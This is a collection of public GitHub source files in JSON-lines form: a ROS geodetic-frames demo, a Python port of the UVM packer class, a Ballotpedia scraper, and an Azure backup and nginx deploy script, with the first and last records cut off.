rospy.logwarn(\"Frames not loaded.\")\n\n rospy.loginfo(\"Open RVIZ and press Enter to continue...\")\n raw_input()\n\n # Example of directly converting TF locations into geo locations\n\n # Here we convert location 0/0/0 in tf frame \"body\" to UTM conversions\n # Note that we do not have to specify explictely how this is converted,\n # as we already configured the equivalence of Geoframe ENU_LEE and\n # tf frame enu in the launch file.\n\n # Python does not support Eigen::Affine therefore we pass a 4x4 Matrix.\n # The output is also returned as 4x4 Matrix\n body_coords = np.identity(4, dtype=\"double\")\n utm_body_coords = converter.convertFromTf(\"body\", body_coords, \"UTM\")\n rospy.loginfo(\n \"UTM coordinates of body origin:\\n%s\", np.array2string(utm_body_coords[0:3, 3])\n )\n\n # Example of Publishing Geolocations as TF frames for visualization.\n\n # Publish TF Frame CornerUTM based on UTM coordinates\n # Note: Overloading Numpy Arrays (Vector & Affine) does not work currently. Therefore the wrapper\n # functions \"publishAffAsTf\" and \"publishVecAsTf\" should be used when using a 4x4 matrix or \n # 3x1 vector, respectively\n utm_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n utm_building_point[0,3] = 465727\n utm_building_point[1,3] = 5247291\n utm_building_point[2,3] = 489.619\n print(converter.publishAffAsTf(\"UTM\", utm_building_point, \"CornerUTM\"))\n\n # Publish TF Frame CornerGPS based on UTM coordinates\n gps_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n gps_building_point[0,3] = 47.37823\n gps_building_point[1,3] = 8.54616\n gps_building_point[2,3] = 489.619\n converter.publishAffAsTf(\"GPS\", gps_building_point, \"CornerGPS\")\n\n # Publish TF Frame CornerENU based on ENU coordinates using a Vector\n ENU_building_point = np.zeros([3,1])\n # Translation x,y,z:\n ENU_building_point[0] = 14.58\n ENU_building_point[1] = 6.64\n ENU_building_point[2] = 0.0\n converter.publishVecAsTf(\"ENU_LEE\", ENU_building_point, \"CornerENU\")\n\n # Publish TF Frame CornerCH based on CH1903+ coordinates\n CH_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n CH_building_point[0,3] = 2683625.9\n CH_building_point[1,3] = 1248088.9\n CH_building_point[2,3] = 442.4\n converter.publishAffAsTf(\"CH1903+\", CH_building_point, \"CornerCH\")\n\n \n\n\n\n rospy.signal_shutdown(True)\n","repo_name":"ethz-asl/geodetic_utils","sub_path":"geotf_python/python/geotf/demo_python_node.py","file_name":"demo_python_node.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":226,"dataset":"github-code","pt":"60"} +{"seq_id":"11282270354","text":"from .uvm_object_globals import *\nfrom .uvm_scope_stack import UVMScopeStack\nfrom .sv import sv\nfrom ..macros.uvm_message_defines import uvm_error, uvm_warning\nfrom typing import List\n\n\nSIZEOF_INT = 32\nMASK_INT = 0xFFFFFFFF\n\n\nclass UVMPacker(object):\n \"\"\"\n The UVMPacker class provides a policy object for packing and unpacking\n uvm_objects. The policies determine how packing and unpacking should be done.\n Packing an object causes the object to be placed into a bit (byte or int)\n array. If the `uvm_field_* macro are used to implement pack and unpack,\n by default no metadata information is stored for the packing of dynamic\n objects (strings, arrays, class objects).\n \"\"\"\n\n\n bitstream = [] # local bits for (un)pack_bytes\n fabitstream = [] # field automation bits for (un)pack_bytes\n\n # //----------------//\n # // Group: Packing //\n # //----------------//\n\n def __init__(self):\n # //------------------//\n # // Group: Variables //\n # //------------------//\n\n # // Variable: physical\n # //\n # // This bit provides a filtering mechanism for fields.\n # //\n # // The and physical settings allow an object to distinguish between\n # // two different classes of fields. It is up to you, in the\n # // `UVMObject.do_pack` and `UVMObject.do_unpack` methods, to test the\n # // setting of this field if you want to use it as a filter.\n # bit physical = 1\n self.physical = 1\n\n\n # // Variable: abstract\n # //\n # // This bit provides a filtering mechanism for fields.\n # //\n # // The abstract and physical settings allow an object to distinguish between\n # // two different classes of fields. It is up to you, in the\n # // `UVMObject.do_pack` and `UVMObject.do_unpack` routines, to test the\n # // setting of this field if you want to use it as a filter.\n # bit abstract\n self.abstract = 0\n\n\n # // Variable: use_metadata\n # //\n # // This flag indicates whether to encode metadata when packing dynamic data,\n # // or to decode metadata when unpacking. Implementations of `UVMObject.do_pack`\n # // and `UVMObject.do_unpack` should regard this bit when performing their\n # // respective operation. When set, metadata should be encoded as follows:\n # //\n # // - For strings, pack an additional ~null~ byte after the string is packed.\n # //\n # // - For objects, pack 4 bits prior to packing the object itself. Use 4'b0000\n # // to indicate the object being packed is ~null~, otherwise pack 4'b0001 (the\n # // remaining 3 bits are reserved).\n # //\n # // - For queues, dynamic arrays, and associative arrays, pack 32 bits\n # // indicating the size of the array prior to packing individual elements.\n # bit use_metadata\n self.use_metadata = 0\n\n\n # // Variable: big_endian\n # //\n # // This bit determines the order that integral data is packed (using\n # // , , , or ) and how the\n # // data is unpacked from the pack array (using ,\n # // , , or ). When the bit is set,\n # // data is associated msb to lsb; otherwise, it is associated lsb to msb.\n # //\n # // The following code illustrates how data can be associated msb to lsb and\n # // lsb to msb:\n # //\n # //| class mydata extends uvm_object;\n # //|\n # //| logic[15:0] value = 'h1234;\n # //|\n # //| function void do_pack (UVMPacker packer);\n # //| packer.pack_field_int(value, 16);\n # //| endfunction\n # //|\n # //| function void do_unpack (UVMPacker packer);\n # //| value = packer.unpack_field_int(16);\n # //| endfunction\n # //| endclass\n # //|\n # //| mydata d = new;\n # //| bit bits[];\n # //|\n # //| initial begin\n # //| d.pack(bits); // 'b0001001000110100\n # //| uvm_default_packer.big_endian = 0;\n # //| d.pack(bits); // 'b0010110001001000\n # //| end\n # bit big_endian = 1\n self.big_endian = 1\n\n # variables and methods primarily for internal use\n self.count = 0 # used to count the number of packed bits\n self.scope = UVMScopeStack()\n self.reverse_order = 0 # flip the bit order around\n self.byte_size = 8 # set up bytesize for endianess\n self.word_size = 16 # set up worksize for endianess\n self.nopack = 0 # only count packable bits\n self.policy = UVM_DEFAULT_POLICY\n self.m_bits = 0x0 # uvm_pack_bitstream_t\n self.m_packed_size = 0\n\n\n # // Function: pack_field\n # //\n # // Packs an integral value (less than or equal to 4096 bits) into the\n # // packed array. ~size~ is the number of bits of ~value~ to pack.\n #\n # extern def pack_field(self,uvm_bitstream_t value, int size):\n def pack_field(self, value, size) -> None:\n # for (int i=0; i is useful for sizes up\n # // to 64 bits.\n def pack_field_int(self, value: int, size: int) -> None:\n if self.big_endian == 1:\n flipped = self.flip_bit_order(value, size)\n self.m_bits |= flipped << self.count\n #self.m_bits[self.count+i] = value[size-1-i]\n else:\n self.m_bits |= value << self.count\n #self.m_bits[self.count+i] = value[i]\n self.count += size\n\n\n # // Function: pack_bits\n # //\n # // Packs bits from upacked array of bits into the pack array.\n # //\n # // See for additional information.\n # extern def pack_bits(self,ref bit value[], input int size = -1):\n\n\n # // Function: pack_bytes\n # //\n # // Packs bits from an upacked array of bytes into the pack array.\n # //\n # // See for additional information.\n # extern def pack_bytes(self,ref byte value[], input int size = -1):\n def pack_bytes(self, value, size=-1) -> None:\n max_size = len(value) * 8\n\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"pack_bytes called with size '%0d', which exceeds value size of '%0d'\",\n size, max_size))\n return\n else:\n for i in range(len(value)):\n byte = value[i]\n if self.big_endian == 1:\n byte = self.flip_bit_order(value[len(value)-1-i], 8)\n self.m_bits |= byte << self.count\n self.count += 8\n\n\n # // Function: pack_ints\n # //\n # // Packs bits from an unpacked array of ints into the pack array.\n # //\n # // The bits are appended to the internal pack array.\n # // This method allows for fields of arbitrary length to be\n # // passed in, using the SystemVerilog ~stream~ operator.\n # //\n # // For example\n # // | bit[511:0] my_field;\n # // | begin\n # // | int my_stream[];\n # // | { << int {my_stream}} = my_field;\n # // | packer.pack_ints(my_stream);\n # // | end\n # //\n # // When appending the stream to the internal pack array, the packer will obey\n # // the value of (appending the array from MSB to LSB if set).\n # //\n # // An optional ~size~ parameter is provided, which defaults to '-1'. If set\n # // to any value greater than '-1' (including 0), then the packer will use\n # // the size as the number of bits to pack, otherwise the packer will simply\n # // pack the entire stream.\n # //\n # // An error will be asserted if the ~size~ has been specified, and exceeds the\n # // size of the source array.\n # //\n # extern def pack_ints(self,ref int value[], input int size = -1):\n def pack_ints(self, value, size=-1) -> None:\n max_size = len(value) * SIZEOF_INT\n\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"pack_ints called with size '%0d', which exceeds value size of '%0d'\",\n size, max_size))\n return\n else:\n for i in range(len(value)):\n int_num = value[i]\n if self.big_endian == 1:\n int_num = self.flip_bit_order(value[len(value)-1-i],\n SIZEOF_INT)\n self.m_bits |= int_num << self.count\n self.count += SIZEOF_INT\n\n\n # // Function: pack_string\n # //\n # // Packs a string value into the pack array.\n # //\n # // When the metadata flag is set, the packed string is terminated by a ~null~\n # // character to mark the end of the string.\n # //\n # // This is useful for mixed language communication where unpacking may occur\n # // outside of SystemVerilog UVM.\n #\n # extern def pack_string(self,string value):\n def pack_string(self, value) -> None:\n bytearr = value.encode()\n\n size = 8 * len(bytearr)\n bits = int(bytearr.hex(), 16)\n if self.big_endian == 1:\n bits = self.flip_bit_order(bits, -1)\n self.m_bits |= bits << self.count\n self.count += size\n if self.use_metadata == 1:\n pass\n # TODO self.m_bits |= 0 << self.count\n # byte b\n # foreach (value[index]):\n # if(self.big_endian == 0)\n # self.m_bits[count +: 8] = value[index]\n # else begin\n # b = value[index]\n # for(int i=0; i<8; ++i)\n # self.m_bits[count+i] = b[7-i]\n # end\n # count += 8\n # end\n # if(use_metadata == 1):\n # self.m_bits[count +: 8] = 0\n # count += 8\n # end\n #endfunction\n\n\n # // Function: pack_time\n # //\n # // Packs a time ~value~ as 64 bits into the pack array.\n #\n # extern def pack_time(self,time value):;\n\n\n # // Function: pack_real\n # //\n # // Packs a real ~value~ as 64 bits into the pack array.\n # //\n # // The real ~value~ is converted to a 6-bit scalar value using the function\n # // $real2bits before it is packed into the array.\n #\n # extern def pack_real(self,real value):\n\n\n # // Function: pack_object\n # //\n # // Packs an object value into the pack array.\n # //\n # // A 4-bit header is inserted ahead of the string to indicate the number of\n # // bits that was packed. If a ~null~ object was packed, then this header will\n # // be 0.\n # //\n # // This is useful for mixed-language communication where unpacking may occur\n # // outside of UVM.\n #\n # extern def pack_object(self,uvm_object value):\n def pack_object(self, value) -> None:\n if value in value._m_uvm_status_container.cycle_check:\n uvm_warning(\"CYCFND\", sv.sformatf(\"Cycle detected for object @%0d during pack\",\n value.get_inst_id()))\n return\n\n value._m_uvm_status_container.cycle_check[value] = 1\n\n if((self.policy != UVM_REFERENCE) and value is not None):\n if self.use_metadata == 1:\n pass\n #self.m_bits[count +: 4] = 1\n #count += 4; // to better debug when display packed bits in hexadecimal\n\n self.scope.down(value.get_name())\n value._m_uvm_field_automation(None, UVM_PACK,\"\")\n value.do_pack(self)\n self.scope.up()\n elif self.use_metadata == 1:\n pass\n #self.m_bits[count +: 4] = 0\n #count += 4\n del value._m_uvm_status_container.cycle_check[value]\n\n\n # //------------------//\n # // Group: Unpacking //\n # //------------------//\n\n # // Function: is_null\n # //\n # // This method is used during unpack operations to peek at the next 4-bit\n # // chunk of the pack data and determine if it is 0.\n # //\n # // If the next four bits are all 0, then the return value is a 1; otherwise\n # // it is 0.\n # //\n # // This is useful when unpacking objects, to decide whether a new object\n # // needs to be allocated or not.\n #\n # extern def is_null(self):\n\n\n # // Function: unpack_field\n # //\n # // Unpacks bits from the pack array and returns the bit-stream that was\n # // unpacked. ~size~ is the number of bits to unpack; the maximum is 4096 bits.\n #\n # extern def unpack_field(self,int size):\n def unpack_field(self, size):\n return self.unpack_field_int(size)\n # unpack_field = 0b0\n # if (self.enough_bits(size,\"integral\")):\n # count += size\n # for (int i=0; i int:\n unpack_field_int = 0x0\n count_before = self.count\n if self.enough_bits(size,\"integral\"):\n self.count += size\n for i in range(size):\n if self.big_endian:\n bit_sel = self.count-i-1\n bit_sel = (1 << bit_sel)\n unpack_field_int |= self.m_bits & bit_sel\n else:\n bit_sel = self.count-size+i\n bit_sel = (1 << bit_sel)\n unpack_field_int |= self.m_bits & bit_sel\n unpack_field_int >>= count_before\n if self.big_endian:\n unpack_field_int = self.flip_bit_order(unpack_field_int, size)\n return unpack_field_int\n\n\n # // Function: unpack_bits\n # //\n # // Unpacks bits from the pack array into an unpacked array of bits.\n # //\n # extern def unpack_bits(self,ref bit value[], input int size = -1):\n #\n\n # // Function: unpack_bytes\n # //\n # // Unpacks bits from the pack array into an unpacked array of bytes.\n # //\n # extern def unpack_bytes(self,ref byte value[], input int size = -1):\n def unpack_bytes(self, value, size=-1):\n max_size = len(value) * 8\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"unpack_bytes called with size '%0d', which exceeds value size of '%0d'\",\n size, len(value)))\n return []\n else:\n if self.enough_bits(size, \"integral\"):\n self.count += size\n for b in range(len(value)):\n byte = (self.m_bits >> b * 8) & 0xFF\n if self.big_endian == 1:\n byte = self.flip_bit_order(byte, 8)\n value[len(value)-1-b] = byte\n else:\n value[b] = byte\n return value\n\n\n # // Function: unpack_ints\n # //\n # // Unpacks bits from the pack array into an unpacked array of ints.\n # //\n # // The unpacked array is unpacked from the internal pack array.\n # // This method allows for fields of arbitrary length to be\n # // passed in without expanding into a pre-defined integral type first.\n # //\n # // For example\n # // | bit[511:0] my_field;\n # // | begin\n # // | int my_stream[] = new[16]; // 512/32 = 16\n # // | packer.unpack_ints(my_stream);\n # // | my_field = {<<{my_stream}};\n # // | end\n # //\n # // When unpacking the stream from the internal pack array, the packer will obey\n # // the value of (unpacking the array from MSB to LSB if set).\n # //\n # // An optional ~size~ parameter is provided, which defaults to '-1'. If set\n # // to any value greater than '-1' (including 0), then the packer will use\n # // the size as the number of bits to unpack, otherwise the packer will simply\n # // unpack the entire stream.\n # //\n # // An error will be asserted if the ~size~ has been specified, and\n # // exceeds the size of the target array.\n # //\n # extern def unpack_ints(self,ref int value[], input int size = -1):\n def unpack_ints(self, value, size=-1):\n max_size = len(value) * SIZEOF_INT\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"unpack_ints called with size '%0d', which exceeds value size of '%0d'\",\n size, len(value)))\n return\n else:\n if self.enough_bits(size, \"integral\"):\n self.count += size\n for i in range(len(value)):\n int_num = (self.m_bits >> i * SIZEOF_INT) & 0xFFFFFFFF\n if self.big_endian == 1:\n int_num = self.flip_bit_order(int_num, SIZEOF_INT)\n value[len(value)-1-i] = int_num\n else:\n value[i] = int_num\n return value\n\n\n # // Function: unpack_string\n # //\n # // Unpacks a string.\n # //\n # // num_chars bytes are unpacked into a string. If num_chars is -1 then\n # // unpacking stops on at the first ~null~ character that is encountered.\n #// If num_chars is not -1, then the user only wants to unpack a\n #// specific number of bytes into the string.\n def unpack_string(self, num_chars=-1):\n # byte b\n i = 0\n is_null_term = 0 # Assumes a ~None~ terminated string\n # int i; i=0\n if num_chars == -1:\n is_null_term = 1\n\n #val_to_decode = 0x0\n # We'll use bytearray to decode this, so need to find the num of bytes\n\n byte_arr = bytearray()\n #unpack_string = 0\n curr_byte = (self.m_bits >> self.count) & 0xFF\n while (self.enough_bits(8,\"string\", is_error=False) and\n ((curr_byte != 0) or (is_null_term == 0)) and\n ((i < num_chars) or (is_null_term == 1))):\n # silly, because cannot append byte/char to string\n #unpack_string = unpack_string + \" \"\n #if self.big_endian == 0:\n # unpack_string[i] = self.m_bits[count +: 8]\n #else:\n # for(int j=0; j<8; ++j)\n # b[7-j] = self.m_bits[count+j]\n # unpack_string[i] = b\n i += 1\n byte_arr.insert(0, curr_byte)\n self.count += 8\n curr_byte = (self.m_bits >> self.count) & 0xFF\n if self.enough_bits(8,\"string\", is_error=False):\n self.count += 8\n return byte_arr.decode()\n #return unpack_string\n\n\n # // Function: unpack_time\n # //\n # // Unpacks the next 64 bits of the pack array and places them into a\n # // time variable.\n #\n # extern def unpack_time(self):;\n\n\n\n # // Function: unpack_real\n # //\n # // Unpacks the next 64 bits of the pack array and places them into a\n # // real variable.\n # //\n # // The 64 bits of packed data are converted to a real using the $bits2real\n # // system function.\n #\n # extern def unpack_real(self):\n\n\n\n # // Function: unpack_object\n # //\n # // Unpacks an object and stores the result into ~value~.\n # //\n # // ~value~ must be an allocated object that has enough space for the data\n # // being unpacked. The first four bits of packed data are used to determine\n # // if a ~null~ object was packed into the array.\n # //\n # // The function can be used to peek at the next four bits in\n # // the pack array before calling this method.\n #\n # extern def unpack_object(self,uvm_object value):\n def unpack_object(self, value):\n is_non_null = 1\n\n if value in value._m_uvm_status_container.cycle_check:\n uvm_warning(\"CYCFND\", sv.sformatf(\n \"Cycle detected for object @%0d during unpack\", value.get_inst_id()))\n return\n value._m_uvm_status_container.cycle_check[value] = 1\n\n if self.use_metadata == 1:\n is_non_null = get_bits(self.m_bits, self.count, 4) != 0 # [count +: 4]\n self.count += 4\n\n # NOTE- policy is a ~pack~ policy, not unpack policy;\n # and you can't pack an object by REFERENCE\n if value is not None:\n if is_non_null > 0:\n self.scope.down(value.get_name())\n value._m_uvm_field_automation(None, UVM_UNPACK,\"\")\n value.do_unpack(self)\n self.scope.up()\n else:\n pass\n # TODO: help do_unpack know whether unpacked result would be null\n # to avoid new'ing unnecessarily;\n # this does not nullify argument; need to pass obj by ref\n elif ((is_non_null != 0) and (value is None)):\n uvm_error(\"UNPOBJ\",\"cannot unpack into None object\")\n del value._m_uvm_status_container.cycle_check[value]\n\n\n # // Function: get_packed_size\n # //\n # // Returns the number of bits that were packed.\n def get_packed_size(self) -> int:\n return self.m_packed_size\n\n\n # extern def unpack_object_ext(self,inout uvm_object value):\n\n\n # extern def get_packed_bits(self):\n def get_packed_bits(self) -> int:\n return self.m_bits\n\n\n # extern def bit unsigned get_bit (self,int unsigned index):\n def get_bit(self, index) -> int:\n if index >= self.m_packed_size:\n self.index_error(index, \"bit\",1)\n return (self.m_bits >> index) & 0x1\n\n\n # extern def byte unsigned get_byte (self,int unsigned index):\n # extern def int unsigned get_int (self,int unsigned index):\n\n # extern def get_bits(self,ref bit unsigned bits[]):\n def get_bits(self) -> int:\n return self.m_bits\n\n # extern def get_bytes(self,ref byte unsigned bytes[]):\n def get_bytes(self) -> List[int]:\n sz = 0\n v = 0x00\n sz = int((self.m_packed_size+7) / 8)\n bytes = [0] * sz\n for i in range(sz):\n if (i != sz-1 or (self.m_packed_size % 8) == 0):\n v = (self.m_bits >> (i * 8)) & 0xFF\n else:\n sel = (0xFF >> (8-(self.m_packed_size % 8)))\n v = (self.m_bits >> (i * 8)) & sel\n if self.big_endian:\n v = self.flip_bit_order(v, 8)\n bytes[i] = v\n return bytes\n\n\n # extern def get_ints(self):\n def get_ints(self) -> List[int]:\n sz = 0\n v = 0\n sz = int((self.m_packed_size+31) / SIZEOF_INT)\n ints = [0] * sz\n for i in range(sz):\n if i != sz-1 or (self.m_packed_size % 32) == 0:\n v = (self.m_bits >> (i * SIZEOF_INT)) & 0xFFFFFFFF\n else:\n sel = (0xFFFFFFFF >> (32-(self.m_packed_size % 32)))\n v = (self.m_bits >> (i * SIZEOF_INT)) & sel\n if self.big_endian:\n v = self.flip_bit_order(v, SIZEOF_INT)\n ints[i] = v\n return ints\n\n\n # extern def put_bits(self,ref bit unsigned bitstream[]):\n def put_bits(self, bitstream):\n # int bit_size\n # bit_size = bitstream.size()\n #\n # if(self.big_endian)\n # for (int i=bit_size-1;i>=0;i--)\n # self.m_bits[i] = bitstream[i]\n # else\n # for (int i=0;i int:\n flipped = 0x0\n num_bits = len(bin(value)) - 2\n while value:\n flipped = (flipped << 1) + (value & 0x1) # Choose LSB\n value = value >> 1\n # For packing, need to add some right-padding\n if size != -1:\n rem_bits = size - num_bits\n if rem_bits >= 0:\n flipped <<= rem_bits\n else:\n raise Exception(\"rem_bits negative. size: {}, value: {}\".format(\n size, hex(value)))\n return flipped\n\n\n#//------------------------------------------------------------------------------\n#// IMPLEMENTATION\n#//------------------------------------------------------------------------------\n#\n#// NOTE- max size limited to BITSTREAM bits parameter (default: 4096)\n#\n#\n#// put_bytes\n#// ---------\n#\n#def void UVMPacker::put_bytes (self,ref byte unsigned bytestream []):\n#\n# int byte_size\n# int index\n# byte unsigned b\n#\n# byte_size = bytestream.size()\n# index = 0\n# for (int i=0;i= (m_packed_size+7)/8)\n# index_error(index, \"byte\",8)\n# return self.m_bits[index*8 +: 8]\n#endfunction\n#\n#\n#// get_int\n#// -------\n#\n#def int unsigned UVMPacker::get_int(self,int unsigned index):\n# if (index >= (m_packed_size+31)/32)\n# index_error(index, \"int\",32)\n# return self.m_bits[(index*32) +: 32]\n#endfunction\n#\n#\n#// PACK\n#\n#\n#\n#\n#// pack_real\n#// ---------\n#\n#def void UVMPacker::pack_real(self,real value):\n# pack_field_int($realtobits(value), 64)\n#endfunction\n#\n#\n#// pack_time\n#// ---------\n#\n#def void UVMPacker::pack_time(self,time value):\n# pack_field_int(value, 64)\n# //m_bits[count +: 64] = value; this overwrites endian adjustments\n#endfunction\n#\n#\n#\n#\n#\n#// pack_bits\n#// -----------------\n#\n#def void UVMPacker::pack_bits(self,ref bit value[], input int size = -1):\n# if (size < 0)\n# size = len(value)\n#\n# if (size > len(value)):\n# uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n# sv.sformatf(\"pack_bits called with size '%0d', which exceeds len(value) of '%0d'\",\n# size,\n# len(value)))\n# return\n# end\n#\n# for (int i=0; i len(value)):\n# uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n# sv.sformatf(\"unpack_bits called with size '%0d', which exceeds len(value) of '%0d'\",\n# size,\n# len(value)))\n# return\n# end\n#\n# if (self.enough_bits(size, \"integral\")):\n# count += size\n# for (int i=0; i> (i-idx))\n idx += 1\n return val\n","repo_name":"tpoikela/uvm-python","sub_path":"src/uvm/base/uvm_packer.py","file_name":"uvm_packer.py","file_ext":"py","file_size_in_byte":30663,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"60"} +{"seq_id":"12074515702","text":"import urllib2\nimport urllib\nimport os\nimport re\nimport cache\nimport encode\nimport lxml.html\nimport lxml\nimport wiki\n\n\"\"\" \nthe results is a dictionary :\nnames\nlinks\nwp\n\n\"\"\" \n\ndef parse_ballotwiki_page(x,reps,obj) :\n d = cache.cachewp ('http://ballotpedia.org%s?printable=yes' % x)\n html = lxml.html.document_fromstring( d )\n return wiki.parse_wiki_page_links(html,reps,obj)\n \ndef parse(url) :\n reps = {\n 'wp': {},\n 'names': {},\n 'links': {},\n }\n d = cache.cachewp (url)\n myparser = lxml.etree.HTMLParser(encoding=\"utf-8\")\n html = lxml.etree.HTML(d, parser=myparser)\n for r in html.xpath(\"//ol/li\") :\n for l in r.xpath(\"a\"):\n f_name_link = l.get(\"href\")\n f_name_element = l.text\n\n obj = {\n 'links' : {\n 'homepage' : {}\n },\n 'link' : f_name_link,\n 'name' : f_name_element\n }\n link = re.search(\"/([^\\/]+)$\",f_name_link).group(1) \n link = urllib.unquote(link)\n link = encode.decode(link)\n\n \"\"\" we are going to collect all the links and point to the object \"\"\" \n# print link, f_name_element, f_name_link \n reps['wp'][link]= parse_ballotwiki_page(f_name_link,reps,obj)\n reps['names'][f_name_element]= obj\n\n return reps\n\n\n","repo_name":"h4ck3rm1k3/rootstrikers-wikipedia","sub_path":"Ballotpedia.py","file_name":"Ballotpedia.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42004244037","text":"#!/usr/bin/env python\n\n\"\"\"Backup and deploy script\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport glob\nimport shutil\n\nfrom fabric.api import run, env, put, sudo\n\nimport azure.common\nfrom azure.storage.file import FileService\nfrom azure.storage.blob import BlockBlobService\n\n\ndef get_backup(gw_account_name, gw_account_key, gw_account_share, backup_local_path):\n\n \"\"\"Upload directories and files from $account_name to local $backup_local_path using Azure FileService\"\"\"\n\n print('\\nRunning get_backup from the {} and file share {} to local path {}.\\n'.format(gw_account_name, gw_account_share, backup_local_path))\n\n file_service = FileService(account_name=gw_account_name, account_key=gw_account_key)\n share_dirs_list = file_service.list_directories_and_files(gw_account_share)\n\n for share_dir_name in share_dirs_list:\n\n backup_local_dir = os.path.join(backup_local_path, share_dir_name.name)\n\n if not os.path.isdir(backup_local_dir):\n print('Local backup directory {} not found, creating...'.format(backup_local_dir))\n os.makedirs(backup_local_dir)\n\n share_files_list = file_service.list_directories_and_files(gw_account_share, share_dir_name.name)\n for share_file in share_files_list:\n try:\n print('Getting file: {}'.format(os.path.join('/', share_dir_name.name, share_file.name)))\n # example:\n # file_service.get_file_to_path('gwdevproxydata', 'datanginx-conf.d', 'jm-gw-proxy-dev.domain.tld.conf', '/tmp/jm-gw-proxy-dev.domain.tld.conf-out')\n file_service.get_file_to_path(gw_account_share, share_dir_name.name, share_file.name, os.path.join(backup_local_dir, share_file.name))\n # to pass /data/datahtml/.well-known dir on master host\n except azure.common.AzureMissingResourceHttpError as e:\n print('\\nWARNING: {}\\n'.format(e))\n\n\ndef push_backup(bac_account_name, bac_account_key, bac_container_name, backup_local_path):\n\n \"\"\"Upload directories and files from $backup_local_path to account_name using Azure BlockBlobService\"\"\"\n\n print('\\nRunning push_backup from local path {} to the {} and container {}\\n'.format(backup_local_path, bac_account_name, bac_container_name))\n\n now = datetime.datetime.today().strftime('%Y_%m_%d_%H_%M')\n\n for root, dirs, files in os.walk(backup_local_path, topdown=True):\n for name in dirs:\n path = os.path.join(root, name)\n for filename in os.listdir(path):\n fullpath = os.path.join(path, filename)\n\n block_blob_service = BlockBlobService(account_name=bac_account_name, account_key=bac_account_key)\n # example\n # block_blob_service.create_blob_from_path(container_name, 'datanginx-conf.d/jm-gw-proxy-production.domain.tld.conf', '/tmp/datanginx-conf.d/jm-gw-proxy-production.domain.tld.conf')\n print('Uploading {} as {}'.format(fullpath, os.path.join(now, name, filename)))\n block_blob_service.create_blob_from_path(bac_container_name, os.path.join(now, name, filename), fullpath)\n\n\ndef update_datanginxconfd(gw_account_name, gw_account_key, gw_account_share):\n\n \"\"\"Upload data from cloned repo to the GW Storage account into the datanginx-conf.d directory with overwriting\"\"\"\n\n print('\\nRunning update_confd to the {} and file share {} to the path datanginx-conf.d.\\n'.format(gw_account_name, gw_account_share))\n\n file_service = FileService(account_name=gw_account_name, account_key=gw_account_key)\n\n configs = glob.glob('*.conf')\n for config in configs:\n print('Uploading config: {}'.format(config))\n file_service.create_file_from_path(gw_account_share, 'datanginx-conf.d', config, config)\n\n\ndef cleanup_backup_local_path(backup_local_path):\n\n print('Cleaning up local {} directory....'.format(backup_local_path))\n shutil.rmtree(backup_local_path)\n\n\ndef nginx_reload(gw_proxy_host, gw_proxy_user, gw_proxy_key, gw_proxy_ports):\n\n \"\"\"Will connect to the Master and Secondary host to execute \"nginx -t\" before reload\"\"\"\n\n for port in gw_proxy_ports:\n env.host_string = gw_proxy_host + ':' + str(port)\n env.key_filename = [os.path.join('.ssh', gw_proxy_key)]\n env.user = gw_proxy_user\n\n validate_status = sudo('nginx -t')\n\n if validate_status.return_code == 0:\n print('OK: NGINX configs validated\\n')\n else:\n print('ERROR: can\\'t validate NGINX\\n')\n exit(1)\n\n reload_status = sudo('systemctl reload nginx.service')\n\n if reload_status.return_code == 0:\n print('\\nOK: NGINX reload complete\\n')\n else:\n print('\\nERROR: can\\'t reload NGINX\\n')\n exit(1)\n\n nginx_status = run('curl -s localhost > /dev/null')\n\n if nginx_status.return_code == 0:\n print('\\nOK: NGINX reloaded status code: {}\\n'.format(nginx_status.return_code))\n else:\n print('\\nERROR: NGINX reloaded status code: {}\\n'.format(nginx_status.return_code))\n exit(1)\n\nif __name__ == \"__main__\":\n\n try:\n gw_account_name = os.environ['GW_ACCOUNT_NAME']\n gw_account_key = os.environ['GW_ACCOUNT_KEY']\n gw_account_share = os.environ['GW_ACCOUNT_SHARE']\n\n bac_account_name = os.environ['BAC_ACCOUNT_NAME']\n bac_account_key = os.environ['BAC_ACCOUNT_KEY']\n bac_account_container = os.environ['BAC_ACCOUNT_CONTAINER']\n\n backup_local_path = os.environ['BAC_LOCAL_PATH']\n\n gw_proxy_host = os.environ['GW_PROXY_HOST']\n gw_proxy_user = os.environ['GW_PROXY_USER']\n gw_proxy_key = os.environ['GW_PROXY_KEY']\n gw_proxy_ports = [2200, 2201]\n\n except KeyError as e:\n print('ERROR: no such environment variable - {}'.format(e))\n sys.exit(1)\n\n # download all files and directories from:\n # $gw_account_name (jmgatewayproxydata) $gw_account_share (gwproxydata)\n # to $backup_local_path (/tmp/GW_TEMP_BACKUP)\n get_backup(gw_account_name, gw_account_key, gw_account_share, backup_local_path)\n\n # upload all data from:\n # $backup_local_path (/tmp/GW_TEMP_BACKUP)\n # to:\n # $bac_account_name (jmbackup) $bac_account_container (jm-gw-proxy-backup)\n push_backup(bac_account_name, bac_account_key, bac_account_container, backup_local_path)\n\n # upload all *.conf files from local directory (i.e. cloned repository)\n # to the $gw_account_name (jmgatewayproxydata) $gw_account_share (gwproxydata)\n update_datanginxconfd(gw_account_name, gw_account_key, gw_account_share)\n\n # SSH to the $gw_proxy_host (jm-gw-proxy-production.domain.tld)\n # and execute:\n # 1. nginx -t\n # 2. systemctl reload nginx.service\n # 3. curl -s localhost > /dev/null\n nginx_reload(gw_proxy_host, gw_proxy_user, gw_proxy_key, gw_proxy_ports)\n\n # remove local $backup_local_path 